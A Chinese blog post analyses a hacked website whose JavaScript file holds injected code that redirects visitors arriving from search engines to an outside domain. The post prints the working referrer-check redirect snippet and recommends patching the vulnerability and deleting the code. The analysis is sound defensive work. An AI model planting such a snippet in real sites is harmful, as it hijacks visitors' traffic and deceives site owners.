学课技术网
专注PHP学习资源

分享一段流量劫持JS代码

今天帮一个朋友分析了一个网站,症状是从搜索引擎访问,网站会跳转到另一个网站去,直接输入网址,网站没有发生跳转,通过一系列的分析发现罪魁祸首隐藏在js文件里面,下面是代码:

var regexp=/\.(sogou|soso|baidu|google|youdao|yahoo|bing|118114|biso|gougou|ifeng|ivc|sooule|niuhu|biso)(\.[a-z0-9\-]+){1,2}\//ig;
var where =document.referrer;
if(regexp.test(where))
{
window.location.href='https://www.dobunkan.com'
}

从日志上来看,是有人通过网站的漏洞在网站本身的js文件里面增加了一段代码,而这段代码会判断流量是否是从这些搜索引擎来的,如果是从搜索引擎来的,直接跳转到指定的网站,如果不是从这些搜索引擎来的,就不发生跳转,上面的代码中科院发现该黑客劫持了来自搜狗、百度、360、神马、必应、谷歌等搜索引擎的流量,如果你的网站发现类似的代码千万要小心。

解决办法:修复网站漏洞,删除可疑代码,问题即可得到解决。

资源下载此资源下载价格为10积分立即购买
1、如果您遇到版本没有及时更新,或者其他疑问,请联系客服QQ:125252828
2、注意:如果您看到的是两个价格,低价格的是购买连接是购买当前版本,高价格的购买链接是永久免费更新,标题带“已汉化”字样的属于汉化过的!!!
3、如果您购买的是永久更新,请自行保存网盘链接,方便后续下载更新
4、1积分等于1元。购买单个资源点立即支付即可下载,无需注册会员。
5、本站支持免登陆,点立即支付,支付成功就就可以自动下载文件了(因部分插件和模板没来得及汉化,如果需要汉化版,请先咨询清楚再买!)。
6、如果不会安装的,或者不会使用的,费用另收,详情请咨询客服!
7、因程序具备可复制传播性质,所以,一经兑换,不退还积分,购买时请提前知晓!
 收藏 (0) 打赏

您可以选择一种方式赞助本站

支付宝扫一扫赞助

微信钱包扫描赞助

未经允许不得转载,如果本站内容侵犯了您的个人利益,请联系QQ125252828告知。学课技术网 » 分享一段流量劫持JS代码
分享到: 更多 (0)

热门文章

    评论 1

    评论前必须登录!

    立即登录   注册

    1. #-9

      难怪有时候我访问某个网站老是退不出来,原来是这种代码在作怪啊。

      美味的豆芽1年前 (2020-12-05)国内网友谷歌浏览器 Windows 10 登录以回复

    学课技术网专注软件汉化、分享、解密、绿化、Wordpress主题插件优化

    联系我们技术支持
    切换注册

    登录

    忘记密码 ?

    您也可以使用第三方帐号快捷登录

    切换登录

    注册

    我们将发送一封验证邮件至你的邮箱, 请正确填写以完成账号注册和激活